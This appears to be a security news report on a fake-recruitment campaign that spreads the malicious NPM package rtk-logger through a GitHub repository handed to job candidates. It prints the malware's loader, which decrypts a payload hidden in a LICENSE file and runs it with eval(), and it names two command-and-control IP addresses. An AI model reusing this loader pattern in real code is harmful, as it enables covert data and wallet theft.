A sophisticated cybercriminal operation disguised as a Ukrainian Web3 development community has been targeting job seekers with weaponized NPM packages, security researchers warn.
The attack uses fake interview processes to trick unsuspecting candidates into downloading and executing malicious code that steals cryptocurrency wallets, browser data, and sensitive personal information.
The campaign centers on a seemingly legitimate GitHub repository called “EvaCodes-Community/UltraX,” which the attackers present to prospective employees during first-round interviews.
Victims are instructed to clone and run the repository locally as part of a technical assessment. However, the project contains a malicious NPM dependency designed to harvest sensitive data from the target’s system.
On August 9, 2025, a community member approached SlowMist researchers after becoming suspicious of the repository’s contents during an interview process.
The security team’s subsequent analysis revealed a backdoor embedded in the project’s dependencies, confirming the malicious nature of what appeared to be an ordinary Web3 development repository.
SlowMist analysts determined that the attack initially used the NPM package “[email protected],” which was later replaced with “[email protected]” after the original package was removed by NPM’s security team.
The newer package, published on August 8, 2025, contains heavily obfuscated code designed to evade detection while retaining the same malicious functionality.
The threat extends beyond individual victims: the researchers found that two additional GitHub accounts had forked the malicious repository, suggesting a broader campaign targeting multiple potential victims across the Web3 job market.
Infection Mechanism and Code Execution
The malware’s infection vector relies on social engineering rather than technical exploitation, making it particularly dangerous for job seekers in the competitive Web3 space.
Once the victim clones the repository and runs “npm install,” the malicious rtk-logger package automatically triggers its payload through a multi-stage process.
Malicious code location (Source – Medium)
The package’s core malicious code resides in “/rtk-logger/lib/utils/smtp-connection/index.js,” which uses AES-256-CBC decryption to unlock obfuscated payloads stored in the LICENSE file.
The decryption routine uses hardcoded keys and initialization vectors, allowing the malware to execute without any additional network communication during initial deployment.
```js
// Loader from rtk-logger/lib/utils/smtp-connection/index.js, as described above:
// it reads the package's own LICENSE file, decrypts the contents through ./parse
// (AES-256-CBC with a hardcoded key and IV) and executes the result with eval().
const fs = require('fs');
const path = require('path');
const parseLib = require('./parse');
const filePath = path.join(__dirname, 'LICENSE');
fs.readFile(filePath, 'utf8', (_, data) => {
  try {
    eval(parseLib(data));
  } catch (err) {
    console.error('Error during parsing/eval:', err);
  }
});
```
After successful decryption, the malware establishes connections to command-and-control servers at 144.172.112.106 and 172.86.64.67, enabling remote access and data exfiltration while maintaining persistence through various system-level modifications.